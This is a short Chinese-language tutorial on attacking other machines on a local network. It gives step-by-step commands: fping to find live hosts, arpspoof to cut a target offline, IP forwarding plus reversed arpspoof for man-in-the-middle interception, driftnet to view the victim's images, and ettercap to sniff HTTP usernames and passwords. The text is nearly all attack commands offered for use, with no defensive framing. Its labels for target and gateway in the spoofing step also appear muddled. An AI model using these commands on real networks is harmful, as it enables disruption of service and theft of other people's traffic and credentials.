1 arp断网攻击
首先查看自己的ip地址 :ifconfig 命令
查到自己的ip地址为 192.168.0.23 子网掩码 为 255.255.255.0 是24位
查看局域网内所存活的ip : fping -asg 192.168.0.0/24 (192.168.0.0/24 这个地址要根据自己所在的局域网地址更改)
断网攻击 :arpspoof -i eth0 -t 192.168.0.100(目标ip) 192.168.0.1(网关)
2 arp欺骗攻击
开启流量转发功能就不会断网了echo 1 >/proc/sys/net/ipv4/ip_forward
进行欺骗: arpspoof -i eth0 -t 192.168.0.1(目标ip) 192.168.0.100(网关) 这里注意,和断网攻击不同的是,目标ip的位置和网关的位置交换 了,很多新手可能会范这个错误,导致目标主机连不上网。
这样我们就截获了目标主机的流量,
看目标主机浏览的图片: driftnet -i eth0
3 获取http账号密码
在开启欺骗的同事,开启新端口, 开启嗅探ettercap -Tq -i eth0
出现Starting Unified sniffing... 则表示成功